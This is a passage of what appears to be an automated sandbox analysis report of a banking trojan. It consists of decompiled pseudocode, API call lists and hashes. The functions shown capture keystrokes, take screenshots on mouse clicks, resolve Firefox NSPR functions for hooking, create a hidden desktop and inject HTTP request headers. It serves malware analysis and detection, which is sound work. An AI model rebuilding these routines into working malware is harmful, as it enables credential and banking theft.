				if(_t54 == 0 || E0041CB59() == 0) {
					L20:
					return TranslateMessage(_t54);
				} else {
					_t25 = _t54->message;
					if(_t25 != 0x201) {
						__eflags = _t25 - 0x100;
						if(_t25 != 0x100) {
							goto L20;
						}
						__eflags = _t54->wParam - 0x1b;
						if(_t54->wParam == 0x1b) {
							goto L20;
						}
						_t27 = GetKeyboardState( &_v780);
						__eflags = _t27;
						if(_t27 == 0) {
							goto L20;
						}
						_t32 = ToUnicode(_t54->wParam, _t54->lParam & 0x000000ff,  &_v780,  &_v884, 9, 0);
						__eflags = _t32;
						if(_t32 <= 0) {
							goto L20;
						}
						__eflags = _t32 - 1;
						if(__eflags != 0) {
							if(__eflags > 0) {
								L18:
								__eflags = 0;
								 *((short*)(_t69 + 0x10 + _t32 * 2)) = 0;
								_push( &_v884);
								L19:
								E00410179();
								goto L20;
							}
							L17:
							__eflags = _v884 - 0x20;
							if(_v884 < 0x20) {
								goto L20;
							}
							goto L18;
						}
						__eflags = _t54->wParam - 8;
						if(_t54->wParam != 8) {
							goto L17;
						}
						_push(0x403394);
						goto L19;
					}
					EnterCriticalSection(0x422b14);
					if( *0x422b0c > 0) {
						 *0x422b0c =  *0x422b0c + 0xffff;
						_t36 = 2;
						E00419897(_t36,  &_v864);
						_t39 = E0041A6CC( &_v864, 0x1e, 0x1f4);
						_v900 = _t39;
						if(_t39 != 0) {
							E00419897(0,  &_v840);
							_t65 =  &_v884;
							E00419897(1, _t65);
							_t45 =  *0x422b04; // 0x0
							if(_t45 != 0) {
								_t65 = _t45;
							}
							E004129F1( &_v840, 0x104,  &_v524,  &_v840);
							_t66 = _v888;
							E00407C62(0x104, _t66,  &_v524);
							 *((intOrPtr*)( *_t66 + 8))(_t66, _t65,  *0x423dd0, GetTickCount());
						}
					}
					LeaveCriticalSection(0x422b14);
					goto L20;
				}
			}

0x0041031c
0x00410323
0x0041032a
0x0041046c
0x00410479
0x0041033d
0x0041033d
0x00410345
0x004103fb
0x00410400
0x00000000
0x00000000
0x00410402
0x00410406
0x00000000
0x00000000
0x0041040d
0x00410413
0x00410415
0x00000000
0x00000000
0x00410435
0x0041043b
0x0041043d
0x00000000
0x00000000
0x0041043f
0x00410442
0x00410451
0x0041045b
0x0041045b
0x0041045d
0x00410466
0x00410467
0x00410467
0x00000000
0x00410467
0x00410453
0x00410453
0x00410459
0x00000000
0x00000000
0x00000000
0x00410459
0x00410444
0x00410448
0x00000000
0x00000000
0x0041044a
0x00000000
0x0041044a
0x00410350
0x0041035e
0x00410369
0x00410376
0x00410377
0x00410386
0x0041038b
0x00410391
0x00410399
0x004103a0
0x004103a5
0x004103aa
0x004103b1
0x004103b3
0x004103b3
0x004103d4
0x004103d9
0x004103e3
0x004103eb
0x004103eb
0x00410391
0x004103f3
0x00000000
0x004103f3

APIs

TranslateMessage.USER32(?), ref: 0041046D

Part of subcall function 0041CB59: WaitForSingleObject.KERNEL32(00000000,00419A59,19367401,00000001), ref: 0041CB61

EnterCriticalSection.KERNEL32(00422B14), ref: 00410350
LeaveCriticalSection.KERNEL32(00422B14), ref: 004103F3

Part of subcall function 0041A6CC: LoadLibraryA.KERNEL32(gdiplus.dll,00000000,?,00000000), ref: 0041A6FE
Part of subcall function 0041A6CC: GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0041A70F
Part of subcall function 0041A6CC: GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 0041A71C
Part of subcall function 0041A6CC: GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 0041A729
Part of subcall function 0041A6CC: GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 0041A736
Part of subcall function 0041A6CC: GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 0041A743
Part of subcall function 0041A6CC: GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 0041A750
Part of subcall function 0041A6CC: GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 0041A75D
Part of subcall function 0041A6CC: LoadLibraryA.KERNEL32(ole32.dll), ref: 0041A7A5
Part of subcall function 0041A6CC: GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0041A7B0
Part of subcall function 0041A6CC: LoadLibraryA.KERNEL32(gdi32.dll), ref: 0041A7C2
Part of subcall function 0041A6CC: GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0041A7CD
Part of subcall function 0041A6CC: GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 0041A7D9
Part of subcall function 0041A6CC: GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 0041A7E6
Part of subcall function 0041A6CC: GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 0041A7F3
Part of subcall function 0041A6CC: GetProcAddress.KERNEL32(00000000,SelectObject), ref: 0041A800
Part of subcall function 0041A6CC: GetProcAddress.KERNEL32(00000000,BitBlt), ref: 0041A80D
Part of subcall function 0041A6CC: GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 0041A81A

GetTickCount.KERNEL32 ref: 004103B5
GetKeyboardState.USER32(?), ref: 0041040D
ToUnicode.USER32 ref: 00410435

Strings

, xrefs: 00410453

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad$CriticalSection$CountEnterKeyboardLeaveMessageObjectSingleStateTickTranslateUnicodeWait
String ID:
API String ID: 2762424063-3916222277
Opcode ID: d561a10079d9d55a0bb8a1fe2f282126c7cc0b6f1e2f444e8a2a06ed3a110af2
Instruction ID: 5f1607d5043f637df0f7600997b5fdd72c13017be32289de030d1584882e31db
Opcode Fuzzy Hash: d561a10079d9d55a0bb8a1fe2f282126c7cc0b6f1e2f444e8a2a06ed3a110af2
Instruction Fuzzy Hash: 5031E8316043059BDB20AF64DD85AEB77A8EB44304F04483BFA50D7161D7B8D9C5CB9E

Uniqueness

Uniqueness Score: -1.00%

Function 0040F321, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 30
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F321(struct HINSTANCE__* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t14;

				 *0x422af8 =  *0x422af8 & 0x00000000;
				 *0x422afc =  *0x422afc & 0x00000000;
				_t14 = __eax;
				InitializeCriticalSection(0x422adc);
				 *0x422af4 = _a4;
				 *0x422ad0 = _a8;
				 *0x422b00 = _a12;
				 *0x422ad4 = _t14;
				 *0x422acc = _a16;
				 *0x422ac8 = GetProcAddress(_t14, "PR_GetNameForIdentity");
				 *0x422ad8 = GetProcAddress( *0x422ad4, "PR_SetError");
				_t12 = GetProcAddress( *0x422ad4, "PR_GetError");
				 *0x422ac4 = _t12;
				return _t12;
			}

0x0040f321
0x0040f328
0x0040f335
0x0040f337
0x0040f341
0x0040f34a
0x0040f358
0x0040f361
0x0040f36e
0x0040f380
0x0040f392
0x0040f397
0x0040f399
0x0040f39f

APIs

InitializeCriticalSection.KERNEL32(00422ADC,0001FD30,00404FAD,00422360), ref: 0040F337
GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 0040F373
GetProcAddress.KERNEL32(PR_SetError), ref: 0040F385
GetProcAddress.KERNEL32(PR_GetError), ref: 0040F397

Strings

PR_SetError, xrefs: 0040F375
PR_GetError, xrefs: 0040F387
PR_GetNameForIdentity, xrefs: 0040F353

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$CriticalInitializeSection
String ID: PR_GetError$PR_GetNameForIdentity$PR_SetError
API String ID: 2804437462-2578621715
Opcode ID: 550289f4f7917d93e03015e96d4a8ba38c92fca56fc84cfea84f9df1d5dd8299
Instruction ID: de04fd533e2a2eb6c8905065d537bb01b4dc4b3f5977b66f92c88e4a817f4fab
Opcode Fuzzy Hash: 550289f4f7917d93e03015e96d4a8ba38c92fca56fc84cfea84f9df1d5dd8299
Instruction Fuzzy Hash: 8B019D75A00315AFC734DF65EE48A063FE4FB48361B90487AE418E3A60D3F894829F98

Uniqueness

Uniqueness Score: -1.00%

Function 00418DFB, Relevance: 12.2, APIs: 8, Instructions: 180
threadsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00418DFB(void* __edx, intOrPtr* _a4) {
				char _v524;
				char _v544;
				char _v556;
				intOrPtr _v572;
				char _v924;
				char _v1028;
				char _v1040;
				char _v1060;
				intOrPtr _v1104;
				intOrPtr _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				char _v1120;
				char* _v1124;
				intOrPtr _v1128;
				char _v1132;
				intOrPtr _v1144;
				signed short _v1146;
				char _v1148;
				signed int _v1152;
				signed int _v1156;
				char _v1157;
				signed int _v1160;
				void* _v1164;
				void* _v1168;
				char _v1177;
				char _v1180;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t59;
				void* _t62;
				signed int _t71;
				char _t77;
				char* _t85;
				char _t88;
				char _t95;
				short _t100;
				intOrPtr* _t105;
				void* _t111;
				char _t112;
				signed int _t118;
				signed int _t119;
				void* _t123;

				_t111 = __edx;
				_t105 = _a4;
				_t59 =  *(_t105 + 4);
				_push(_t118);
				_t119 = _t118 | 0xffffffff;
				_v1152 = _t119;
				_v1156 = _t119;
				if(_t59 == _t119 || _t59 == 0xfffffffe) {
					L4:
					_t62 = E0041237D( *((intOrPtr*)( *_t105 + 8)), _t108, 0);
					_t109 =  *_t105;
					_t63 = E00414D87(_t62,  *_t105,  *((intOrPtr*)( *_t105 + 4)));
					_v1160 = _t63;
					_t133 = _t63 - _t119;
					if(_t63 == _t119) {
						goto L20;
					}
					E004150F9(_t109, _t63);
					E004150B7(_v1160);
					_push(_t105 + 8);
					_push(3);
					_push(_v1164);
					_t123 = 4;
					if(E004183A6(_t109, _t123, _t133) == 0) {
						goto L20;
					}
					_t71 =  *(_t105 + 4);
					if(_t71 == 0xfffffffe) {
						SetThreadPriority(GetCurrentThread(), 1);
						E0041C9FB(0x2937498d,  &_v1028, 0);
						_t63 = E004108EC(_t109, __eflags,  &_v1040);
						__eflags = _t63;
						if(_t63 == 0) {
							goto L20;
						}
						_t77 = E0040B81B(_t109, _t111,  &_v924, 1);
						__eflags = _t77;
						if(_t77 == 0) {
							L19:
							_t63 = E0040BA86( &_v924, 1);
							goto L20;
						} else {
							__imp__GetShellWindow();
							__eflags = _t77;
							_v1157 = _t77 != 0;
							__eflags = _v1157;
							if(_v1157 == 0) {
								E00419897(0xa8,  &_v1132);
								_t85 =  &_v524;
								__imp__SHGetFolderPathW(0, 0x25, 0, 0, _t85);
								__eflags = _t85;
								if(_t85 == 0) {
									_t88 = E00417593( &_v1132,  &_v544,  &_v544);
									__eflags = _t88;
									if(_t88 != 0) {
										_t112 = 0x44;
										E00411DB1( &_v1120,  &_v1120, 0, _t112);
										_v1124 =  &_v1060;
										_v1132 = _t112;
										_t95 = E004135C5( &_v556, 0, 0,  &_v1132,  &_v1180);
										__eflags = _t95;
										if(_t95 != 0) {
											WaitForSingleObject(_v1168, 0x1388);
											CloseHandle(_v1164);
											CloseHandle(_v1168);
											_v1177 = 1;
										}
									}
								}
							}
							SystemParametersInfoW(0x1003, 0, 0, 0);
							__eflags = _v1157 - 1;
							if(__eflags == 0) {
								_v1132 =  &_v924;
								_v1128 = 0x40bc90;
								_v1124 = 0x40bc93;
								_v1120 = E0040BC96;
								_v1116 = E0040BCBA;
								_v1112 = E0040BD01;
								_v1108 = E0040BD36;
								_v1104 = 0x40bc90;
								E0040D6D4(__eflags, _v1156,  &_v1132, _v924, _v572);
							}
							goto L19;
						}
					} else {
						if(_t71 == 0xffffffff) {
							_t63 = E004063A9(_v1156, _t109);
						} else {
							_push(_v1152);
							_t63 = E00414EFA(_v1156);
							_t105 = _a4;
						}
						goto L20;
					}
				} else {
					_t100 = 2;
					_v1148 = _t100;
					_t108 =  *(_t105 + 4) << 8;
					_v1146 =  *(_t105 + 5) & 0x000000ff |  *(_t105 + 4) << 0x00000008;
					_v1144 = 0x100007f;
					_t63 = E00414D46( &_v1148);
					_v1152 = _t63;
					if(_t63 == _t119) {
						L20:
						E004150A1(E004150A1(_t63, _v1156), _v1152);
						E00411CFE(_t105);
						return 0;
					} else {
						E004150F9(_t108, _t63);
						goto L4;
					}
				}
			}

0x00418dfb
0x00418e08
0x00418e0b
0x00418e0e
0x00418e0f
0x00418e13
0x00418e17
0x00418e1d
0x00418e63
0x00418e6a
0x00418e6f
0x00418e74
0x00418e79
0x00418e7d
0x00418e7f
0x00000000
0x00000000
0x00418e86
0x00418e8f
0x00418e97
0x00418e98
0x00418e9a
0x00418ea0
0x00418ea8
0x00000000
0x00000000
0x00418eae
0x00418eb4
0x00418ee7
0x00418efd
0x00418f0a
0x00418f0f
0x00418f11
0x00000000
0x00000000
0x00418f20
0x00418f25
0x00418f27
0x00419053
0x0041905c
0x00000000
0x00418f2d
0x00418f2d
0x00418f33
0x00418f35
0x00418f3a
0x00418f3f
0x00418f4e
0x00418f53
0x00418f60
0x00418f66
0x00418f68
0x00418f75
0x00418f7a
0x00418f7c
0x00418f80
0x00418f88
0x00418f94
0x00418fac
0x00418fb0
0x00418fb5
0x00418fb7
0x00418fc2
0x00418fd2
0x00418fd8
0x00418fda
0x00418fda
0x00418fb7
0x00418f7c
0x00418f68
0x00418fe7
0x00418fed
0x00418ff2
0x00419009
0x00419016
0x0041901e
0x00419026
0x0041902e
0x00419036
0x0041903e
0x00419046
0x0041904e
0x0041904e
0x00000000
0x00418ff2
0x00418eb6
0x00418eb9
0x00418ed4
0x00418ebb
0x00418ebb
0x00418ec3
0x00418ec8
0x00418ec8
0x00000000
0x00418eb9
0x00418e24
0x00418e2a
0x00418e2b
0x00418e34
0x00418e3f
0x00418e44
0x00418e4c
0x00418e51
0x00418e57
0x00419061
0x0041906e
0x00419074
0x00419081
0x00418e5d
0x00418e5e
0x00000000
0x00418e5e
0x00418e57

APIs

Part of subcall function 00414D46: #23.WS2_32(?,00000001,00000006,?,0040634A,?,00000000,00000010,?,00000000,?,00000000,?,00000001,?,00000000), ref: 00414D4F
Part of subcall function 00414D46: #4.WS2_32(00000000,?,-0000001D), ref: 00414D6F
Part of subcall function 00414D46: #3.WS2_32(00000000), ref: 00414D7A

Part of subcall function 004150F9: #21.WS2_32(?,00000006,00000001,?,00000004,?,?,0040530A,00000000), ref: 0041510F

GetCurrentThread.KERNEL32 ref: 00418EE0
SetThreadPriority.KERNEL32(00000000), ref: 00418EE7

Part of subcall function 004108EC: OpenWindowStationW.USER32(?,00000000,10000000), ref: 00410911
Part of subcall function 004108EC: CreateWindowStationW.USER32 ref: 00410924
Part of subcall function 004108EC: GetProcessWindowStation.USER32 ref: 00410935
Part of subcall function 004108EC: OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 00410970
Part of subcall function 004108EC: CreateDesktopW.USER32 ref: 00410984
Part of subcall function 004108EC: GetCurrentThreadId.KERNEL32 ref: 00410990
Part of subcall function 004108EC: GetThreadDesktop.USER32(00000000), ref: 00410997
Part of subcall function 004108EC: SetThreadDesktop.USER32(00000000,00000000,00000000), ref: 004109A9
Part of subcall function 004108EC: CloseDesktop.USER32(00000000,00000000,00000000), ref: 004109BB
Part of subcall function 004108EC: CloseWindowStation.USER32(?,?), ref: 004109D6

Part of subcall function 0040B81B: TlsAlloc.KERNEL32(00422918,00000000,0000018C,00000000,00000000), ref: 0040B834

GetShellWindow.USER32 ref: 00418F2D
SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?,?), ref: 00418F60

Part of subcall function 00417593: PathCombineW.SHLWAPI(0041C47F,0041C47F,?,0041C47F,?,?), ref: 004175B2

WaitForSingleObject.KERNEL32(00000000,00001388,?,00000000,00000000,?,00000044,?,00000000,00000044,?,?), ref: 00418FC2
CloseHandle.KERNEL32(?), ref: 00418FD2
CloseHandle.KERNEL32(?), ref: 00418FD8
SystemParametersInfoW.USER32 ref: 00418FE7

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: DesktopThreadWindow$CloseStation$CreateCurrentHandleOpenPath$AllocCombineFolderInfoObjectParametersPriorityProcessShellSingleSystemWait
String ID:
API String ID: 2295704857-0
Opcode ID: 0e8c90a275b7062a3dbd84e506d1c7e79d791c6bcceda2c9040e92c26671535b
Instruction ID: c682e1bb6c1ac47b12d33020679d924b71445d6bca498164bd42e4eae6f0d342
Opcode Fuzzy Hash: 0e8c90a275b7062a3dbd84e506d1c7e79d791c6bcceda2c9040e92c26671535b
Instruction Fuzzy Hash: AF61A2710083419FD720EF65C884EDFBBE8EFC5704F00492EF594A61A1DB7898858BAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040E95B, Relevance: 12.2, APIs: 8, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E95B(void* __ecx, void* __eflags, void* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				signed char* _v20;
				void* _v24;
				intOrPtr _v40;
				intOrPtr _v44;
				void* _v48;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				void* _v80;
				void* _v108;
				signed int _v120;
				signed int _v124;
				char _v128;
				void* _v129;
				void* _v132;
				void* _v140;
				signed int _v176;
				void* _v177;
				intOrPtr _v180;
				void* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t85;
				signed int _t88;
				intOrPtr _t89;
				void* _t92;
				void* _t96;
				void* _t100;
				signed int _t107;
				intOrPtr _t108;
				intOrPtr _t111;
				intOrPtr _t113;
				intOrPtr _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				intOrPtr _t118;
				signed char* _t119;
				signed int _t120;
				struct _CRITICAL_SECTION* _t126;
				intOrPtr _t131;
				char* _t138;
				char* _t139;
				char* _t140;
				signed int _t142;
				signed int _t148;
				signed int _t151;
				void* _t153;

				_t153 = (_t151 & 0xfffffff8) - 0x7c;
				_v120 = _v120 | 0xffffffff;
				_t122 =  &_v76;
				if(E0040E840( &_v76, __ecx, __eflags, _a4,  *_a8,  *_a12) == 0) {
					L23:
					E0041BED2( &_v76);
					return _v120;
				}
				_t85 = E0041B5A4(_t122);
				_v120 = _t85;
				if((1 & _t85) == 0) {
					__eflags = _t85 & 0x00000002;
					if((_t85 & 0x00000002) == 0) {
						_t126 = 0x422aa4;
						L18:
						__eflags =  *(_t153 + 0x18) & 0x00000004;
						if(( *(_t153 + 0x18) & 0x00000004) == 0) {
							goto L23;
						}
						 *_a8 = _v40;
						 *_a12 =  *((intOrPtr*)(_t153 + 0x68));
						EnterCriticalSection(_t126);
						_t146 = _a4;
						_t88 = E0040DEC2(_a4);
						__eflags = _t88 - 0xffffffff;
						if(_t88 != 0xffffffff) {
							L21:
							_t89 =  *0x422abc; // 0x0
							_t148 = _t88 * 0x24;
							__eflags = _t148;
							E00411CFE( *((intOrPtr*)(_t148 + _t89 + 8)));
							_t131 =  *0x422abc; // 0x0
							 *((intOrPtr*)(_t148 + _t131 + 8)) = _v44;
							L22:
							LeaveCriticalSection(_t126);
							goto L23;
						}
						_t88 = E0040DEE8(_t88, _t146);
						__eflags = _t88 - 0xffffffff;
						if(_t88 == 0xffffffff) {
							goto L22;
						}
						goto L21;
					}
					_v124 = _v124 & 0x00000000;
					 *(_t153 + 0xf) = 1;
					__eflags =  *((intOrPtr*)(_t153 + 0x7c)) - 1;
					if( *((intOrPtr*)(_t153 + 0x7c)) != 1) {
						L9:
						_t138 = _t153 + 0x28;
						_t92 = 0x21;
						E00419861(_t92, _t138);
						HttpAddRequestHeadersA(_a4, _t138, 0xffffffff, 0xa0000000);
						_t139 =  &_v128;
						_t96 = 0x22;
						E00419861(_t96, _t139);
						HttpAddRequestHeadersA(_a4, _t139, 0xffffffff, 0x80000000);
						_t140 = _t153 + 0x28;
						_t100 = 0x23;
						E00419861(_t100, _t140);
						HttpAddRequestHeadersA(_a4, _t140, 0xffffffff, 0x80000000);
						L10:
						_t126 = 0x422aa4;
						EnterCriticalSection(0x422aa4);
						__eflags =  *(_t153 + 0xf);
						if( *(_t153 + 0xf) == 0) {
							L14:
							E0041BF3C( *((intOrPtr*)(_t153 + 0x80)), _v68);
							__eflags = _v176;
							if(_v176 != 0) {
								E0041398B( *((intOrPtr*)(_t153 + 0x10)));
							}
							L16:
							LeaveCriticalSection(_t126);
							goto L18;
						}
						_t150 = _a4;
						_t107 = E0040DEC2(_a4);
						__eflags = _t107 - 0xffffffff;
						if(_t107 != 0xffffffff) {
							L13:
							_t108 =  *0x422abc; // 0x0
							_t142 = _t107 * 0x24;
							E0041BF3C( *((intOrPtr*)(_t108 + _t142 + 0x10)),  *((intOrPtr*)(_t108 + _t142 + 0xc)));
							_t111 =  *0x422abc; // 0x0
							E00411CFE( *((intOrPtr*)(_t142 + _t111 + 0x14)));
							_t113 =  *0x422abc; // 0x0
							 *(_t142 + _t113 + 0x14) =  *(_t142 + _t113 + 0x14) & 0x00000000;
							_t114 =  *0x422abc; // 0x0
							 *(_t142 + _t114 + 0x1c) =  *(_t142 + _t114 + 0x1c) & 0x00000000;
							_t115 =  *0x422abc; // 0x0
							 *(_t142 + _t115 + 0x18) =  *(_t142 + _t115 + 0x18) | 0xffffffff;
							_t116 =  *0x422abc; // 0x0
							 *((intOrPtr*)(_t142 + _t116 + 0xc)) = _v76;
							_t117 =  *0x422abc; // 0x0
							 *((intOrPtr*)(_t142 + _t117 + 0x10)) = _v72;
							_t118 =  *0x422abc; // 0x0
							 *((intOrPtr*)(_t142 + _t118 + 0x20)) = _v180;
							goto L16;
						}
						_t107 = E0040DEE8(_t107, _t150);
						__eflags = _t107 - 0xffffffff;
						if(_t107 == 0xffffffff) {
							goto L14;
						}
						goto L13;
					}
					_t119 = _v20;
					__eflags =  *_t119 & 0x00000003;
					if(( *_t119 & 0x00000003) == 0) {
						goto L9;
					}
					_t120 = E0041C176(_t119,  &_v76);
					_v124 = _t120;
					__eflags = _t120;
					if(_t120 != 0) {
						_v120 = 1;
					} else {
						 *(_t153 + 0xf) = _t120;
					}
					goto L10;
				} else {
					SetLastError(0x2f78);
					_v120 = _v120 & 0x00000000;
					goto L23;
				}
			}

0x0040e961
0x0040e967
0x0040e976
0x0040e984
0x0040eb6c
0x0040eb70
0x0040eb7f
0x0040eb7f
0x0040e98d
0x0040e995
0x0040e99b
0x0040e9b2
0x0040e9b4
0x0040eb07
0x0040eb0c
0x0040eb0c
0x0040eb11
0x00000000
0x00000000
0x0040eb1a
0x0040eb24
0x0040eb26
0x0040eb2c
0x0040eb2f
0x0040eb34
0x0040eb37
0x0040eb44
0x0040eb46
0x0040eb4b
0x0040eb4b
0x0040eb52
0x0040eb5b
0x0040eb61
0x0040eb65
0x0040eb66
0x00000000
0x0040eb66
0x0040eb3a
0x0040eb3f
0x0040eb42
0x00000000
0x00000000
0x00000000
0x0040eb42
0x0040e9ba
0x0040e9bf
0x0040e9c3
0x0040e9c7
0x0040e9ef
0x0040e9f1
0x0040e9f5
0x0040e9f6
0x0040ea0e
0x0040ea12
0x0040ea16
0x0040ea17
0x0040ea2a
0x0040ea2e
0x0040ea32
0x0040ea33
0x0040ea41
0x0040ea43
0x0040ea43
0x0040ea49
0x0040ea4f
0x0040ea54
0x0040eade
0x0040eae9
0x0040eaee
0x0040eaf3
0x0040eaf9
0x0040eaf9
0x0040eafe
0x0040eaff
0x00000000
0x0040eaff
0x0040ea5a
0x0040ea5d
0x0040ea62
0x0040ea65
0x0040ea72
0x0040ea74
0x0040ea79
0x0040ea84
0x0040ea89
0x0040ea92
0x0040ea97
0x0040ea9c
0x0040eaa1
0x0040eaa6
0x0040eaab
0x0040eab0
0x0040eab5
0x0040eabe
0x0040eac2
0x0040eacb
0x0040eacf
0x0040ead8
0x00000000
0x0040ead8
0x0040ea68
0x0040ea6d
0x0040ea70
0x00000000
0x00000000
0x00000000
0x0040ea70
0x0040e9c9
0x0040e9cd
0x0040e9d0
0x00000000
0x00000000
0x0040e9d6
0x0040e9db
0x0040e9df
0x0040e9e1
0x0040e9e9
0x0040e9e3
0x0040e9e3
0x0040e9e3
0x00000000
0x0040e99d
0x0040e9a2
0x0040e9a8
0x00000000
0x0040e9a8

APIs

Part of subcall function 0041B5A4: EnterCriticalSection.KERNEL32(00423A34,?,?,?), ref: 0041B5BF
Part of subcall function 0041B5A4: LeaveCriticalSection.KERNEL32(00423A34,?,?,?), ref: 0041B642

SetLastError.KERNEL32(00002F78,?), ref: 0040E9A2
EnterCriticalSection.KERNEL32(00422AA4), ref: 0040EA49
LeaveCriticalSection.KERNEL32(00422AA4,?), ref: 0040EAFF
EnterCriticalSection.KERNEL32(00422AA4,?), ref: 0040EB26
LeaveCriticalSection.KERNEL32(00422AA4,?), ref: 0040EB66

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave$ErrorLast
String ID:
API String ID: 486337731-0
Opcode ID: d46dedabc5f4f72c2142b66cd3335a5eb60b5821c7afa2423a1c624167a7e9c2
Instruction ID: d9c854e1b37765dcbf5963ad8dde29cf733aa981f1e2d688d829bd8f3d802894
Opcode Fuzzy Hash: d46dedabc5f4f72c2142b66cd3335a5eb60b5821c7afa2423a1c624167a7e9c2
Instruction Fuzzy Hash: A0518F31604301AFC721DF29C885A5ABBA5FF44328F144A2EF961AB2F1C774DD56CB89

Uniqueness

Uniqueness Score: -1.00%

Function 004051A1, Relevance: 12.2, APIs: 8, Instructions: 151
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004051A1(void* __ecx, void* __eflags) {
				intOrPtr _v74;
				signed int _v78;
				char _v124;
				char _v128;
				intOrPtr _v140;
				void* _v144;
				intOrPtr _v148;
				void* _v152;
				void* _v156;
				void* _v160;
				char _v164;
				void* _v168;
				signed int _v172;
				long _v184;
				void* __esi;
				void* _t47;
				void* _t49;
				void* _t56;
				void* _t57;
				long _t59;
				intOrPtr _t64;
				long _t65;
				void* _t72;
				signed int _t83;
				intOrPtr* _t85;
				signed int _t94;
				long _t97;
				signed int _t98;
				void* _t100;

				_t100 = (_t98 & 0xfffffff8) - 0xac;
				_t83 = 2;
				_t47 = E0041CA33(__ecx, 0x743c152e, _t83);
				_v156 = _t47;
				if(_t47 != 0) {
					if(E0041CB59() == 0) {
						L26:
						E004154D1(_v148);
						_t49 = 0;
						L27:
						return _t49;
					}
					E0040B22C(__ecx,  &_v124);
					_t87 = _v78;
					_t94 = E0040504C( &_v160, _v78,  &_v168) & 0x0000ffff;
					if(_t94 != 0) {
						L7:
						if(_t94 != _v74) {
							E0040B2E7( &_v124);
							_v78 = _t94;
							E0040B33F( &_v128);
						}
						_v144 =  *0x424024;
						_t56 = _v152;
						_v172 = 1;
						if(_t56 != 0) {
							_v140 = _t56;
							_v172 = _t83;
						}
						_t57 = _v160;
						if(_t57 != 0) {
							_t87 = _v172;
							_v172 = _v172 + 1;
							 *((intOrPtr*)(_t100 + 0x2c + _v172 * 4)) = _t57;
						}
						_t59 = WaitForMultipleObjects(_v172,  &_v144, 0, 0xffffffff);
						if(_t59 <= 0) {
							L25:
							E004150A1(_t59, _v156);
							E004150A1(CloseHandle(_v152), _v164);
							CloseHandle(_v160);
							goto L26;
						} else {
							_t85 = __imp__#1;
							while(_t59 < _v172) {
								_t64 =  *((intOrPtr*)(_t100 + 0x2c + _t59 * 4));
								if(_t64 != _v152) {
									if(_t64 != _v160) {
										while(1) {
											L23:
											_t65 =  *_t85(_v168, 0, 0);
											_t97 = _t65;
											if(_t97 == 0xffffffff) {
												break;
											}
											__imp__WSAEventSelect(_t97, 0, 0);
											_v156 = 0;
											__imp__WSAIoctl(_t97, 0x8004667e,  &_v156, 4, 0, 0,  &_v152, 0, 0);
											E004150F9(_t87, _t97);
											if(E00413733(0x20000, E004050D4, _t97) == 0) {
												E004150A1(_t69, _t97);
											}
										}
										_t59 = WaitForMultipleObjects(_v184,  &_v156, 0, _t65);
										if(_t59 > 0) {
											continue;
										}
										goto L25;
									}
									_t72 = _v164;
									L20:
									_v168 = _t72;
									goto L23;
								}
								_t72 = _v156;
								goto L20;
							}
							goto L25;
						}
					}
					while(WaitForSingleObject( *0x424024, 0x3e8) == 0x102) {
						_t87 = _v74;
						_t94 = E0040504C( &_v156, _v74,  &_v164) & 0x0000ffff;
						if(_t94 == 0) {
							continue;
						}
						break;
					}
					if(_t94 == 0) {
						goto L26;
					}
					goto L7;
				}
				_t49 = 1;
				goto L27;
			}

0x004051a7
0x004051b2
0x004051b9
0x004051c0
0x004051c6
0x004051d7
0x0040536f
0x00405373
0x00405378
0x0040537a
0x00405380
0x00405380
0x004051e2
0x004051e7
0x004051f9
0x004051ff
0x0040523c
0x00405241
0x00405248
0x00405252
0x00405257
0x00405257
0x00405261
0x00405265
0x00405269
0x00405273
0x00405275
0x00405279
0x00405279
0x0040527d
0x00405283
0x00405285
0x00405289
0x0040528d
0x0040528d
0x0040529d
0x004052a5
0x0040534b
0x0040534f
0x00405364
0x0040536d
0x00000000
0x004052ab
0x004052ab
0x004052b1
0x004052bb
0x004052c3
0x004052cf
0x00405323
